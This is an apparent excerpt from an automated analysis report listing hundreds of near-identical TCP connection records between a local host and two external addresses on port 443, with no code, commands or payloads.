                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49737 -> 13.107.246.60:443
                          Source: global trafficTCP traffic: 192.168.2.4:49737 -> 13.107.246.60:443
                          Source: global trafficTCP traffic: 192.168.2.4:49737 -> 13.107.246.60:443
                          Source: global trafficTCP traffic: 192.168.2.4:49737 -> 13.107.246.60:443
                          Source: global trafficTCP traffic: 192.168.2.4:49737 -> 13.107.246.60:443
                          Source: global trafficTCP traffic: 192.168.2.4:49737 -> 13.107.246.60:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
